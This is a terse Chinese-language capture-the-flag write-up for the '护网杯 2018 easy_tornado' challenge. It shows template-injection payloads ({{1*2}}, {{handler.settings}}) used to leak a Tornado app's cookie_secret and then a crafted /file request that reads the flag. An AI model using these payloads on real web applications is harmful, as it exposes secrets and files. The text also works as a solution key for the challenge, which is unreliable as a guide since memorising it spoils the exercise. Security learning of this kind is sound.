[护网杯 2018]easy_tornado 进入页面 分别查看 模板注入 /error?msg={{1*2}} 测试过滤 payload:error?msg={{handler.settings}} 得cookie_secret 用PHP解码 最后 payload:/file?filename=/fllllllllllllag&filehash=e9bebc8c9f90af297419119189d8a9e4 进入得flag